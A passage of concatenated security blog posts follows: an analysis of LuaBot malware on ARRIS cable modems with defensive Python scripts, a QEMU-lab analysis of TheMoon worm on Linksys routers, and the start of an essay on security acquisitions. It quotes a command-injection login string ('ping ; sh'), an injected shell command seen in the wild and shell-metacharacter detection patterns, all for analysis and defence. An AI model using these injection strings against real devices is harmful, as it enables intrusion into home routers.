I received some reports that malware authors are remotely exploiting those devices in order to dump the modem's configuration and steal the private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from Malware Must Die! also points out that LuaBot is being used for flooding/DDoS attacks.


Exploit and Initial Infection

LuaBot is part of a bigger botnet targeting embedded devices of multiple architectures. After examining some infected systems, I noticed that most cable modems were compromised through a command injection in the restricted CLI reachable via the ARRIS Password of The Day backdoor.

Telnet honeypots like the one from nothink.org have been logging these exploit attempts for some time. They record many apparent attempts to brute-force the username "system" with the password "ping ; sh", but those are in fact the commands used to escape from the restricted ARRIS telnet shell.
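The point about the honeypot logs is that a "password" carrying shell metacharacters is not a credential guess at all. As an added example (not from the post or from nothink.org), the following Python script separates restricted-shell escape attempts from ordinary dictionary guesses in telnet honeypot logs and counts the sources behind them. The log format is constructed for this example (adapt parse_line() to your own honeypot); one source address is the dropper IP from the post's IoC list, the others are documentation addresses.

```python
"""Triage telnet honeypot credential logs for restricted-shell escapes.
Added example, not from the post or from nothink.org. The log format
below is constructed for this example (adapt parse_line() to your own
honeypot); one source IP is the dropper IP from the post's IoC list,
the others are documentation addresses."""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

SAMPLE_LOG = """\
2016-06-01 05:12:03 telnet 46.148.18.122 login user="root" pass="admin"
2016-06-01 05:12:09 telnet 46.148.18.122 login user="system" pass="ping ; sh"
2016-06-01 05:12:10 telnet 46.148.18.122 login user="system" pass="ping ; sh"
2016-06-01 05:13:41 telnet 203.0.113.7 login user="admin" pass="1234"
2016-06-01 05:14:02 telnet 198.51.100.9 login user="system" pass="ping ; sh"
2016-06-01 05:15:55 telnet 203.0.113.7 login user="root" pass="xc3511"
2016-06-01 05:16:30 telnet 198.51.100.9 login user="admin" pass="$(id)"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) telnet (?P<src>[\d.]+) login '
    r'user="(?P<user>[^"]*)" pass="(?P<password>[^"]*)"$'
)

# A real password guess has no reason to carry shell metacharacters; a
# "password" like "ping ; sh" is a command for a restricted CLI that hands
# the field to a shell, which is how the ARRIS telnet CLI was escaped.
META_RE = re.compile(r'(;|\|\||\||&&|`|\$\()')


class Attempt(NamedTuple):
    ts: str
    src: str
    user: str
    password: str


def parse_line(line: str) -> Optional[Attempt]:
    m = LINE_RE.match(line.strip())
    return Attempt(**m.groupdict()) if m else None


def is_shell_escape(a: Attempt) -> bool:
    """Command injection rather than a dictionary guess."""
    return META_RE.search(a.password) is not None


def is_arris_pod_escape(a: Attempt) -> bool:
    """The exact pair the post reports: user 'system', password 'ping ; sh'."""
    return a.user == "system" and a.password.replace(" ", "") == "ping;sh"


def triage(log_text: str) -> Dict[str, object]:
    attempts = [a for a in map(parse_line, log_text.splitlines()) if a]
    escapes = [a for a in attempts if is_shell_escape(a)]
    return {
        "total": len(attempts),
        "shell_escapes": len(escapes),
        "arris_pod_escapes": sum(is_arris_pod_escape(a) for a in escapes),
        "sources": Counter(a.src for a in escapes),  # who exploits, not who guesses
        "payloads": sorted({a.password for a in escapes}),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The metacharacter test is deliberately broader than the one ARRIS pattern: any honeypot that mimics a vendor CLI will see other injected commands in the password field, and those sources are the ones worth blocking or following up on, not the bulk of dictionary guessers.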


The initial dropper is created by echoing shell commands to the terminal that write out a standard ARM ELF.


I have cross compiled and uploaded a few debugging tools to my cross-utils repository, including gdbserver, strace and tcpdump. I also happen to have a vulnerable ARRIS TG862 so I can perform dynamic analysis in a controlled environment.

If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:

./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)

The dropper is a simple download-and-exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for brute-forcing SSH servers and for trying to exploit Linksys router command injections in the wild. After downloading the second stage malware, the script echoes the following string:
echo -e 61\\\\\\x30ck3r

This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while Observing Large-Scale Router Exploit Attempts:
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules allowing remote access only from very specific subnets while blocking external access to ports 8080, 80, 433, 23 and 22:


These rules block external exploit attempts against the ARRIS services/backdoors, restricting access to networks controlled by the attacker.
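For incident response on a device like this, the tell is in the order of the INPUT chain: a few remote ACCEPTs followed by DROPs on the admin ports. As an added example (not from the post and not the .nttpd binary's rules), the following Python script reads iptables-save output and flags that lock-out pattern; the ruleset it carries is constructed for the example, using two of the subnets from the post's IoC list and the ports the post names.

```python
"""Check an iptables ruleset for the lock-out pattern described above:
INPUT accepts a handful of remote subnets, then drops the admin ports for
everyone else. Added example, not from the post or the .nttpd binary; the
ruleset is constructed in iptables-save syntax using two of the subnets
from the post's IoC list and the ports it names."""
import ipaddress
from typing import Dict, List, Optional

ADMIN_PORTS = {22, 23, 80, 8080}

SAMPLE_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 46.148.18.0/24 -j ACCEPT
-A INPUT -s 185.56.30.0/24 -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 8080 -j DROP
COMMIT
"""


def parse_input_rule(line: str) -> Optional[Dict[str, object]]:
    """Pull -s, --dport and -j out of one '-A INPUT ...' line. Only the
    options that matter here are understood; the others are skipped with
    their argument so parsing does not derail."""
    toks = line.split()
    if toks[:2] != ["-A", "INPUT"]:
        return None
    rule: Dict[str, object] = {"src": None, "dport": None, "target": None}
    it = iter(toks[2:])
    for tok in it:
        if tok == "-s":
            rule["src"] = next(it)
        elif tok == "--dport":
            rule["dport"] = int(next(it))
        elif tok == "-j":
            rule["target"] = next(it)
        elif tok in ("-i", "-o", "-p", "-m", "-d", "--sport", "--state"):
            next(it)
    return rule


def analyze_input_chain(rules_text: str) -> Dict[str, object]:
    """Walk the INPUT chain in order (iptables is first-match): ACCEPTs with
    a source that appear before any DROP/REJECT form an allowlist; a
    DROP/REJECT on a port with no source fences that port off for
    everyone else."""
    allowlisted: List[str] = []
    fenced: List[int] = []
    fence_seen = False
    for line in rules_text.splitlines():
        r = parse_input_rule(line)
        if r is None:
            continue
        if r["target"] == "ACCEPT" and r["src"] and not fence_seen:
            allowlisted.append(str(r["src"]))
        elif r["target"] in ("DROP", "REJECT") and r["dport"] and not r["src"]:
            fence_seen = True
            fenced.append(int(r["dport"]))
    public = [s for s in allowlisted
              if ipaddress.ip_network(s, strict=False).is_global]
    return {
        "allowlisted": allowlisted,
        "public_allowlisted": public,
        "fenced_ports": fenced,
        # remote, non-private networks get in while the admin ports are
        # closed to the world: the shape of the attacker's rules
        "suspicious": bool(public) and bool(set(fenced) & ADMIN_PORTS),
    }


if __name__ == "__main__":
    # on a live box:  iptables-save | python3 this_script.py
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RULES
    for k, v in analyze_input_chain(text).items():
        print(f"{k}: {v}")
```

A private-range allowlist (the operator's management LAN) with the same DROPs is normal hardening and is not flagged; what makes the pattern suspicious is public /24s that nobody on the device's side configured.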

After setting up the rules, two additional binaries are transferred and started by the attacker. The first one, .sox.rslv (889100a188a42369fd93e7010f7c654b), is a simple DNS query tool based on udns 0.4.



The other binary, .sox (4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.



Parts of the code resemble some shadowsocks-libev functionality, and there's an interesting reference to the whrq[.]net domain, which seems to be used as a DNSCrypt gateway:



All these binaries are used as auxiliary tools for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.

UPDATE: According to this interview with the supposed malware author, "reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper"


Final Stage: LuaBot

The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled with the same Puma5 toolchain as the one I made available in my cross-utils repository.


If we use strace for a dynamic analysis we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot starts listening on TCP port 11833 and tries to contact the command and control server at 80.87.205.92.


In order to understand how the malware works, let's mix some manual and dynamic analysis. Time to analyse the binary using IDA Pro and...

Reversing stripped binaries

The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize the standard library functions in our ARMEB binary. Instead of spending hours manually reviewing the code, we can use @matalaz's diaphora diffing plugin to port the symbols over.

First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain here and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.

When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and now choose a SQLite database to diff against:


After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.

Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":


The IDA strings window displays lots of information related to the Lua scripting language. For this reason, I also cross-compiled Lua to ARMEB, loaded the "lua" binary into IDA Pro and repeated the diffing process with diaphora:


We're almost done now. If you google some of the debug messages present in the code, you can find a deleted Pastebin that was cached by Google.



I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)



Reversing the malware is much more legible now. There's a builtin Lua interpreter and some native code related to event sockets. The list of the bot's native modules is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:


The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the command and control server. The malware author packed the Lua source code as a GZIP blob, which makes the whole reversing job easier for us, as we don't have to deal with Lua bytecode.


The blob at 0xA40B8 starts with a standard gzip header whose last-modified timestamp is 2016-04-18 17:35:34:


Another easy way to unpack the Lua code is to attach your favorite debugger (gef, of course) to the running binary and dump the process memory (the heap).

First, copy gdbserver to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:
./gdbserver --multi localhost:12345 --attach 1058


Then, start gef/GDB and attach it to the running server:
gdb-multiarch -q
set architecture arm
set endian big
set follow-fork-mode child
gef-remote 192.168.100.1:12345


Lastly, list the memory regions and dump the heap:
vmmap
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000


That's it, now you have the full source code from the LuaBot:
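Both routes above (the gzip blob inside the ELF, and the heap dump taken with gdb) end with the same task: find the gzip header, read its MTIME and inflate the member. As an added example (not code from the post), the following Python carver does exactly that over any file, skipping byte runs that merely look like a header; the input built by build_sample() is constructed data (a fake ELF-like blob with one valid member and one bogus header), not the LuaBot binary, and its MTIME was chosen for the example.

```python
"""Carve gzip members out of a binary blob and read the MTIME each header
carries. Added example, not from the post: run it over the stripped ELF or
over the heap dump taken with gdb above and you get the packed Lua source
without reversing the unpacker. build_sample() is constructed data: a fake
ELF-like blob with one valid gzip member and one bogus header."""
import gzip
import io
import struct
import zlib
from datetime import datetime, timezone
from typing import List, NamedTuple

GZ_MAGIC = b"\x1f\x8b\x08"   # ID1 ID2 CM=deflate (RFC 1952)


class GzMember(NamedTuple):
    offset: int          # where the header sits in the input
    mtime: datetime      # header MTIME as UTC (epoch 0 means "unset")
    payload: bytes       # inflated content


def carve_gzip(blob: bytes) -> List[GzMember]:
    """Find every 1f 8b 08 and try to inflate one member from there.
    Random byte runs that merely look like a header do not inflate (or
    never reach end-of-stream) and are skipped; zlib also checks the
    CRC32/ISIZE trailer, so a corrupt member is rejected, not half-returned."""
    found: List[GzMember] = []
    pos = blob.find(GZ_MAGIC)
    while pos != -1:
        nxt = pos + 1
        if pos + 10 <= len(blob):                    # 10-byte fixed header
            mtime_raw = struct.unpack_from("<I", blob, pos + 4)[0]
            inflater = zlib.decompressobj(wbits=31)  # 31 = gzip wrapper
            try:
                payload = inflater.decompress(blob[pos:])
            except zlib.error:
                payload, inflater = b"", None
            if inflater is not None and inflater.eof:
                when = datetime.fromtimestamp(mtime_raw, tz=timezone.utc)
                found.append(GzMember(pos, when, payload))
                nxt = len(blob) - len(inflater.unused_data)  # skip past member
        pos = blob.find(GZ_MAGIC, nxt)
    return found


def carve_file(path: str) -> List[GzMember]:
    with open(path, "rb") as fh:
        return carve_gzip(fh.read())


def build_sample() -> bytes:
    """Constructed input: ELF magic, 64 bytes of padding, a gzip member with
    MTIME 1461000000 (2016-04-18 17:20:00 UTC) wrapping a stub Lua chunk,
    padding, and a truncated bogus header that must be ignored."""
    lua = b'-- constructed sample, not LuaBot code\nlocal cnc = "198.51.100.23"\n'
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=1461000000) as gz:
        gz.write(lua)
    return (b"\x7fELF" + bytes(64) + buf.getvalue() + bytes(32)
            + b"\x1f\x8b\x08\x00deadbeef")


if __name__ == "__main__":
    import sys
    members = carve_file(sys.argv[1]) if len(sys.argv) > 1 else carve_gzip(build_sample())
    for m in members:
        print(f"offset 0x{m.offset:x}  mtime {m.mtime:%Y-%m-%d %H:%M:%S} UTC  {len(m.payload)} bytes")
        print(m.payload.decode("utf-8", "replace"))
```

The MTIME is worth recording as an indicator in its own right: it is set by the packer at build time, so the same timestamp across samples from different architectures points at one build of the bot.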


The LuaBot source code is composed of several modules:


The bot settings, including the DNS recursor and the C&C settings, are hardcoded:


The code is really well documented and it includes proxy checking functions and a masscan log parser:


The bot author seeds the random number generator from /dev/urandom (cryptographers rejoice):


LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:


Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:


There's a catchy function named checkanus.penetrate_sucuri, which seems to be some sort of bypass for Sucuri's Distributed Denial of Service (DDoS) protection:



LuaBot has its own lua resolver function for DNS queries:


Most of the bot capabilities are in line with the ones described on the Malware Must Die! blogpost. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).

I did not analyse the remote botnet infrastructure, but the modular approach and the interoperability of the malware indicate a professional and ongoing effort.


Conclusion

The analysed malware doesn't have any persistence mechanism to survive reboots. It doesn't try to reflash the firmware or modify non-volatile partitions (NVRAM for example), but the first stage payload restricts remote access to the device using custom iptables rules.

This is quite an interesting approach because they can quickly masscan the Internet, block external access to those IoT devices and then selectively infect them with the final stage payloads.

In 2015, when I initially reported the ARRIS backdoors, there were over 600,000 vulnerable ARRIS devices exposed on the Internet and 490,000 of them had telnet enabled:
If we perform the same query today (September 2016) we can see that the number of exposed devices has dropped to approximately 35,000:
I know that the media coverage and the security bulletins contributed to that, but I wonder how many of those devices were infected and had external access restricted by some sort of malware...

The high number of Linux devices with Internet-facing administrative interfaces, the use of proprietary Backdoors, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.

IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and end users have to keep their home devices patched and secured.

We need to find better ways to detect, block and contain this new trend. Approaches like the one from SENRIO can help ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.


Indicators of Compromise (IOCs)

LuaBot ARMEB Binaries:
  • drop (5deb17c660de9d449675ab32048756ed)
  • .nttpd (c867d00e4ed65a4ae91ee65ee00271c7)
  • .sox (4b8c0ec8b36c6bf679b3afcc6f54442a)
  • .sox.rslv (889100a188a42369fd93e7010f7c654b)
  • .arm_puma5 (061b03f8911c41ad18f417223840bce0)

GCC Toolchains:
  • GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4
  • GCC: (GNU) 4.2.0 TI-Puma5 20100224

Dropper and CnC IPs:
  • 46.148.18.122
  • 80.87.205.92

IP Ranges whitelisted by the Attacker:
  • 46.148.18.0/24
  • 185.56.30.0/24
  • 217.79.182.0/24
  • 85.114.135.0/24
  • 95.213.143.0/24
  • 185.53.8.0/24


          Analyzing Malware for Embedded Devices: TheMoon Worm        
All the media outlets are reporting that embedded malware is becoming mainstream. This is something totally new and we never heard of it before, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease of crafting exploits make them a perfect target for online criminals. The Internet of Threats is wildly insecure, but definitely not unpatchable.

To all infosec people out there: it's important to understand these threats and report them properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence: no malware samples, no IOCs, and they did not even write a Hakin9 article describing it.

Refrigerator Botnet? Revd. Pastor Laphroaig says Show the PoC || GTFO

The aim for this post is to provide more information to identify/execute embedded binaries, describing how to set your own virtual lab. In case you missed it, head to the first post from the "Analyzing and Running binaries from Firmware Images" series.

TheMoon Worm

Johannes from SANS provided me with a sample of the "TheMoon" malware and posted some interesting information in their handler's diary. Their honeypots captured the scanning activity and linked the exploit to a vulnerable CGI script running on specific firmware versions of the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000 and E900.

SANS handlers classified TheMoon as a worm because of its self-replicating nature. The worm requests the "/HNAP1/" URL to fingerprint and identify potentially vulnerable routers. If you check your firewall and web server logs you may find lots of different IPs probing this URL.

The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNG's inside the ELF binary:


Identifying the Binary

A total of seven different samples were provided; they all seem to be variants of the same malware, judging by their ssdeep matching scores.


Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):


The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a VirusTotal Detection Rate of 3 / 50 on 2014-02-16.



QEMU

We'll be using QEMU to run the binaries in a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the Malta platform.

OpenWRT MIPS

The OpenWrt Malta CoreLV platform is intended to be used with QEMU (in big- or little-endian mode). The install procedure is pretty straightforward using OpenWrt Buildroot, the build system for the distribution, which works on Linux, BSD or macOS. In case you don't remember, the authors of the Carna botnet used it to cross-compile their binaries.

Installing prerequisites (on your favorite Debian Derivative):

Now head to the openwrt folder and configure the build for your Linux kernel, choosing "MIPS Malta CoreLV board (qemu)" as the Target System and "Little Endian" as the subtarget. Don't forget to save the config.




Now build your image (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):



Your image will be ready after a couple of minutes. Now you need to install QEMU full system emulation binaries and start it with the right command switches:


To exit the console simply hit CTRL+A followed by C and Q.

If you want to connect your emulated machine to a real network, follow the steps from Aurelien's blog or simply run the following commands to get Internet access:

If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from here or here (at your own risk).

You may remember that it was not possible to run busybox-simet using the standalone qemu-mips-static. That can be fixed by manually patching QEMU, or you can run it inside the proper virtual machine (OpenWrt Malta MIPS/big endian):


Debian MIPS Linux

I won't describe how to set up your Debian MIPS Linux because Zach Cutlip already did an amazing job describing it in his blog post. The process is quite similar to the OpenWrt one and, if you're too lazy to build your own environment, Aurelien provides pre-compiled binaries here. Don't forget to set your network connections up properly.

Dynamic Analysis

In order to emulate the Linksys environment, let's download and unpack the firmware for the E2500v2 (v1.0.07).

Copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm into the appropriate "/tmp" folder. Back up your QEMU image, start sniffing the bridged network (tap1 in my case) and bind the necessary pseudo-devices into the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot with the target filesystem is highly recommended. If you try to chroot and run the worm without binding these devices, it will refuse to run and won't drop the second stage binary.

You can use strace to log the syscalls and then start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS kernel (vmlinux-2.6.32-5-4kc-malta); the 3.2.0 version (vmlinux-3.2.0-4-4kc-malta) seems to work fine.



If you don't want to use strace, simply start sh chrooted and run the malware:


The worm tries to remove files with certain extensions and performs a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written to disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (debug log).


It's possible to dump QEMU's physical memory with the pmemsave command: hit CTRL+A, C to enter QEMU's monitor and enter:



The 256MB raw dump will be saved on your host's local path. You can now try to use volatility or run strings against it.



The worm starts scanning ports 80 and 8080 on a hardcoded list of networks. If the /HNAP1/ URL returns a string identifying one of the targeted routers, the malware sends an HTTP POST trying to exploit a command injection in the vulnerable CGI.
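The two-step behaviour described here and in the SANS diary section above (an /HNAP1/ fingerprint, then a POST to the CGI) is easy to pick out of ordinary web server logs, which is the check any operator of these routers would want. As an added example (not from the post or from SANS), the following Python script does that over Apache combined-format log lines; the lines are constructed for the example, and /vulnerable.cgi is a hypothetical path standing in for the Linksys CGI, which the post does not name.

```python
"""Spot TheMoon-style activity in web server logs: a GET /HNAP1/
fingerprint followed by a POST to a CGI from the same source. Added
example, not from the post or SANS. Log lines are constructed in Apache
combined format; /vulnerable.cgi is a hypothetical path standing in for
the Linksys CGI, which the post does not name."""
import re
from typing import Dict, List, NamedTuple, Optional

SAMPLE_LOG = """\
203.0.113.7 - - [13/Feb/2014:06:12:01 +0000] "GET /HNAP1/ HTTP/1.1" 200 1210 "-" "-"
203.0.113.7 - - [13/Feb/2014:06:12:02 +0000] "POST /vulnerable.cgi HTTP/1.1" 200 512 "-" "-"
198.51.100.9 - - [13/Feb/2014:06:15:44 +0000] "GET /HNAP1/ HTTP/1.1" 404 209 "-" "-"
192.0.2.33 - - [13/Feb/2014:06:20:10 +0000] "GET /index.html HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
192.0.2.33 - - [13/Feb/2014:06:20:11 +0000] "GET /HNAP1/ HTTP/1.1" 200 1210 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Feb/2014:06:30:00 +0000] "GET /HNAP1/ HTTP/1.1" 200 1210 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


class Hit(NamedTuple):
    src: str
    ts: str
    method: str
    path: str
    status: int


def parse_line(line: str) -> Optional[Hit]:
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return Hit(d["src"], d["ts"], d["method"], d["path"], int(d["status"]))


def is_hnap_probe(hit: Hit) -> bool:
    return hit.method == "GET" and hit.path.rstrip("/").upper() == "/HNAP1"


def find_probes(log_text: str) -> Dict[str, Dict[str, object]]:
    """Per source IP: how often it asked for /HNAP1/, whether this host
    answered 200 (i.e. it speaks HNAP, which is what the worm keys on),
    and any CGI POSTs that came after a probe from the same IP."""
    state: Dict[str, Dict[str, object]] = {}
    for hit in filter(None, map(parse_line, log_text.splitlines())):
        s = state.setdefault(hit.src, {"probes": 0, "answered": False, "cgi_posts": []})
        if is_hnap_probe(hit):
            s["probes"] += 1
            s["answered"] = s["answered"] or hit.status == 200
        elif hit.method == "POST" and hit.path.lower().endswith(".cgi") and s["probes"]:
            s["cgi_posts"].append(hit.path)
    return {src: s for src, s in state.items() if s["probes"]}


def exploit_sources(log_text: str) -> List[str]:
    """IPs that went past fingerprinting to the POST stage."""
    return sorted(src for src, s in find_probes(log_text).items() if s["cgi_posts"])


if __name__ == "__main__":
    for src, s in find_probes(SAMPLE_LOG).items():
        print(src, s)
    print("exploit attempts from:", exploit_sources(SAMPLE_LOG))
```

A lone /HNAP1/ request is only a scanner; the "answered" flag tells you whether your own host replied the way a vulnerable router would, and a CGI POST from the same source right after it is the exploit attempt worth pulling the request body for.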





Decoded POST:


TheMoon also starts an HTTPS server ("Lunar Base") on the router, on the random port recorded in the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and the other values seem to be random. Searching for these entries in the scans.io SSL certificate datasets would be really interesting.


The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:




Rkhunter reports a few warnings on the infected system. I have uploaded the complete output from rkhunter to Pastebin; get it here.


Another useful technique is to compare the contents of the filesystem with a known-good template. You can use binwally, WinMerge or binwalk's hashmatch.
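As an added example (not the post's own tooling), this Python script performs the same kind of comparison: it hashes every file in a known-good tree and in the extracted suspect tree and lists additions, removals and changes, which is how the .L26 artefacts and deleted files would show up. The sample trees it builds under a temporary directory are constructed, with placeholder contents for the .L26 files.

```python
"""Compare an extracted firmware filesystem against a known-good copy.

Added example, not code from the original post. Assumes both trees are
extracted to local directories; reports files that were added, removed
or changed, keyed by their path relative to each root.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path, chunk=65536):
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hash_tree(root):
    """Map relative path -> digest for every entry under root.

    Symlinks are recorded by their target instead of being followed, so a
    dangling link inside an extracted chroot does not abort the walk.
    """
    root = Path(root)
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            rel = full.relative_to(root).as_posix()
            if full.is_symlink():
                result[rel] = "symlink:" + os.readlink(full)
            else:
                result[rel] = sha256_of(full)
    return result


def diff_trees(good_root, suspect_root):
    """Return {'added': [...], 'removed': [...], 'changed': [...]}."""
    good = hash_tree(good_root)
    suspect = hash_tree(suspect_root)
    common = set(good) & set(suspect)
    return {
        "added": sorted(set(suspect) - set(good)),
        "removed": sorted(set(good) - set(suspect)),
        "changed": sorted(p for p in common if good[p] != suspect[p]),
    }


def build_sample_trees():
    """Constructed sample: a tiny known-good tree and a copy carrying the
    kinds of change described in the post (worm artefacts under /tmp, a
    modified binary, a deleted file). Returns (good_dir, suspect_dir)."""
    base = Path(tempfile.mkdtemp(prefix="fwdiff-"))
    good, suspect = base / "good", base / "suspect"
    for root in (good, suspect):
        (root / "bin").mkdir(parents=True)
        (root / "tmp").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "busybox").write_bytes(b"\x7fELF original busybox")
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/:/bin/sh\n")
    # Changes on the suspect side (all constructed placeholder contents).
    (suspect / "bin" / "busybox").write_bytes(b"\x7fELF modified busybox")
    (suspect / "tmp" / ".L26").write_text("1234\n")
    (suspect / "tmp" / ".L26.lunar").write_text("[constructed lunar base URL]\n")
    (suspect / "tmp" / ".L26.out").write_text("[constructed debug log]\n")
    (suspect / "etc" / "passwd").unlink()
    return str(good), str(suspect)


if __name__ == "__main__":
    good_dir, suspect_dir = build_sample_trees()
    for kind, paths in diff_trees(good_dir, suspect_dir).items():
        for p in paths:
            print(f"{kind:8s} {p}")
```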




Conclusion

I did not spend much time reversing the files and their functions, as the main purpose of this post was to provide information on identifying and executing embedded binaries, describing how to set up your own virtual lab using QEMU.

It's still possible to improve the analysis by faking the nvram, by running a GDB server with QEMU or by using Volatility with the proper profile and debugging structures, but this post is already way too long. You should also have a look at Avatar, from EURECOM. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.

Let's keep drawing public awareness to the security issues of the Internet of Threats, persuading manufacturers, ISPs and end users to collaborate in addressing these problems.




Recent Acquisitions In The Security Industry And What It Means For Software Security Professionals

The recent news of the acquisitions of McAfee by Intel and of Fortify by HP can be interpreted as a future trend for the security industry: build security into hardware and engineering processes instead of bolting security onto products. Intel's acquisition of McAfee, for example, can be interpreted as a move by Intel to integrate application security with the hardware (e.g. microchips) that Intel currently develops. Similarly, the acquisition of Fortify Software by HP can be interpreted as a move by HP to integrate software security within HP's suite of software testing tools. Moreover, the news of McAfee's acquisition by Intel can also be interpreted as a sign that the age of companies as pure providers of antivirus tools has come to an end. This was also predicted by John Kula in his book, Hacking Wall St attacks and countermeasures: "By the end of 2010, conventional pattern matching anti-virus systems will be completely dead. Their effectiveness will have fallen below 50%."

To understand how signature-based Anti-Virus (AV) detection and eradication tools have come of age, we need to look at the evolution of security threats in the last two decades and how it affected the effectiveness of AV tools in mitigating current threats such as cybercrime. This is mostly because the security threats that consumers and businesses have to protect themselves from today are very different from the ones they had to protect themselves from ten years ago. In the 90's the main targets for viruses were users' PCs; typical attack vectors included opening unknown email attachments that infected the PC and spread to the company servers. In 2001 we witnessed the appearance of the first malicious rootkit for Windows NT: such a rootkit had the capability to sneak under the radar of the anti-virus software and evade detection. In 2003 denial of service attacks took advantage of the spreading of worms for infrastructure-wide exploitation of buffer overflows, such as the SQL Slammer worm that caused denial of service to several ATMs at banks such as Bank of America and Washington Mutual. As new signatures were developed to detect and eradicate viruses and worms, the effectiveness of Anti-Virus tools rested on the capacity to identify viruses and worms by the unique signature of the attacks, as well as on the capability to eradicate them after the infection by patching the infected system. But in 2005 we witnessed email phishing attacks that spread Trojan programs embedded in apparently harmless files, eluding anti-virus software and firewalls, with the purpose of data exfiltration such as stealing passwords and sensitive data. In 2007 we had evidence of botnet-controlled trojans used as crimeware tools to rob online bank customers, spreading either through targeted phishing attacks or through drive-by download infections.
